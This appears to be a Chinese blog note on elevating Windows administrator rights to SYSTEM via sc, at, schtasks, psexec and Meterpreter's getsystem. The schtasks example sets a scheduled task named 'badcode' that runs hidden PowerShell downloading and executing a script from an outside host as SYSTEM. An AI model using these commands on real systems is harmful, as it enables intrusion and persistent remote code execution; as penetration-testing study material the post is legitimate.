文章目录

  • 前言
  • 1. 通过sc命令(只适用于win xp)
  • 2. 通过计划任务命令(win7-win10)
    • 2.1 通过at命令实现(只适用于win7)
    • 2.2 通过schtasks实现(win7-win10)
  • 3. 通过psexec
  • 4. Meterpreter
  • 参考文章

前言

对windows中从admin到system权限到方法做一个小的记录。主要参考了三好学生的博客,三好学生博客地址。
以下利用方式的前提是已经获取了计算机的administrator权限。

1. 通过sc命令(只适用于win xp)

以system权限启动notepad

sc Create badcode binPath= "cmd /c notepad.exe" type= own type= interact
sc start badcode

2. 通过计划任务命令(win7-win10)

计划任务有两种命令,at与schtasks。

2.1 通过at命令实现(只适用于win7)

以system权限在早晨7.50分启动notepad

at 7:50 notepad.exe

2.2 通过schtasks实现(win7-win10)

以system权限在每天早晨7.50分启动notepad

schtasks /Create /TN badcode /SC DAILY /ST 07:50 /TR "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\\\"http://172.16.250.3:802/a\\\"))\"" /RU SYSTEM
schtasks /run /tn badcode
schtasks /Query /TN badcode
schtasks /Delete /TN badcode /F


3. 通过psexec

#隐藏打开的notepad的窗口。

psexec.exe -accepteula -s -d notepad.exe

#以交互式的形式打开notepad

psexec.exe -accepteula -s -i notepad.exe

4. Meterpreter

获得administrator权限后直接使用getsystem命令即可获得system权限。

简单点说实现的原理是windows中倘若程序A创建了一个服务并提供了命名管道,然后system权限的服务B在链接此命名管道的时候程序A就能利用ImpersonateNamedPipeClient()函数来获得system权限。

详细的细节可以参考:
getsystem命令原理

参考文章

三好学生博客地址
玩转计划任务
Windows-schtasks命令中的单引号
getsystem命令原理

从administrator到system权限的几种方式相关推荐

  1. linux两种方式改变文件权限,Linux更改文件权限的两种方式

    今天小编要跟大家分享一篇关于Linux更改文件权限的方式,喜欢Linux的小伙伴来看一看吧. 我们知道·Linux系统最主要的特点之一就是--Linux系统是多用户.多任务的操作系统. 何为多用户?就 ...

  2. server2008 sql 账号只读权限_SQL Server 2008数据库创建用户只读权限的两种方式(转载)...

    最优秀的解决方案: https://www.cnblogs.com/hao-1234-1234/p/12699185.html 其它相关文章: 一.命令行方式创建 新建查询窗口,然后输入以下命令然后执 ...

  3. 管理员身份获得 SYSTEM 权限的四种方法

    本文总结了 4 种方法获得 SYSTEM 权限来运行 regedit.exe 文件, 源代码很容易修改成命令行方式运行指定的程序. 1. 以服务方式运行 2. 添加 ACL 的方法 3. HOOK Z ...

  4. linux中赋予普通用户root权限的三种方式

    前言 在成功拿下一个服务器并提权成为root用户以后,为了减少root用户使用时间从而减少被网站管理员发现的概率,就需要新建一个普通用户,并赋予其完全的管理员权限,有以下三种常见的方式 三种方式 1. ...

  5. Android 获得 usb 权限的两种方式

    0. 前言 在做 USB OTG 通信时,第一步就是要能够获取到 usb 的使用权限,因此特地在此处介绍一下两种我用过的获取 usb 权限方式. 1. 直接在 AndroidManifest.xml ...

  6. java enum判断_Java Enum枚举 遍历判断 四种方式(包括 Lambda 表达式过滤)

    packagecom.miracle.luna.lambda;importjava.util.Arrays;/*** @Author Miracle Luna * @Date 2019/6/9 23: ...

  7. winform list集合怎么 in过滤_Java List集合遍历数据的八种方式

    准备工作:使用静态块初始化List数据 private static List list;//静态块 ==> 初始化ArrayListstatic { list = new ArrayList& ...

  8. 未经处理的异常:System.Net.Sockets.SocketException: 以一种访问权限不允许的方式做了一个访问套接字的尝试...

    报错:未经处理的异常:System.Net.Sockets.SocketException: 以一种访问权限不允许的方式做了一个访问套接字的尝试 → 尝试以"管理员身份"运行程序, ...

  9. 获取比Administrator还高的权限——SYSTEM权限

    获取比Administrator还高的权限--SYSTEM权限 设置PsTool环境 常用命令 以系统权限打开cmd 以系统权限打开explorer(其实也是桌面) 首先,我们会用到PsTool中的P ...

最新文章

  1. 配置VMware ESXi 5事件发送到SYSLOG服务器
  2. 云+技术沙龙:计算机视觉的原理及最佳实践
  3. 线程池之SingleThreadPool学习
  4. java如何让控制台不输出报错_Java 控制台输入输出操作记录
  5. redis学习(四) 登录和cookie缓存
  6. java 虚引用 作用_Java的强引用、弱引用、软引用和虚引用,以及用途
  7. P4849 寻找宝藏(模板:四维偏序)
  8. 学习笔记9-C语言-传参、类型限定符、递归
  9. Essential Grouping高性能的数据分组引擎介绍及下载
  10. 蚂蚁集团上市造富:员工激励达1376.9亿元,人均超800万!
  11. 10-2-DBUtils工具
  12. 关于Synchornized,Lock,AtomicBoolean和volatile的区别介绍
  13. Data Guard 三种模式解释
  14. Fiddler-弱网测试设置
  15. 方框加对勾怎么输入_对号“√”怎么输入到方框“□”-空格对号
  16. JavaSE(9)-细节狂魔:OOP之继承多态?20K字长篇看完,有手就行
  17. 英雄联盟胜负预测--简易肯德基上校
  18. 增量式编码器c语言,增量式编码器
  19. 小程序源码:uni-app云开发的网盘助手-多玩法安装简单
  20. 五指山(nefu 84)

热门文章

  1. Oracle EBS DBA培训提纲
  2. 《爱上单片机》读后感——5年后终于了解什么是单片机
  3. 水平仪算公式计算机,水准仪的使用及计算方法
  4. P1359 租用游艇(dijkstra不优化)
  5. 美国服务器怎么怎么修改密码,RAKsmart美国服务器更改密码的简单方法
  6. 信息学奥赛一本通1003:对齐输出
  7. 华为荣耀20s云服务_华为荣耀20s云服务_华为荣耀20和20s的区别
  8. 网易2018实习生招聘笔试题
  9. 阿里天池比赛——食物声音识别
  10. .NET 实现手机短信验证接口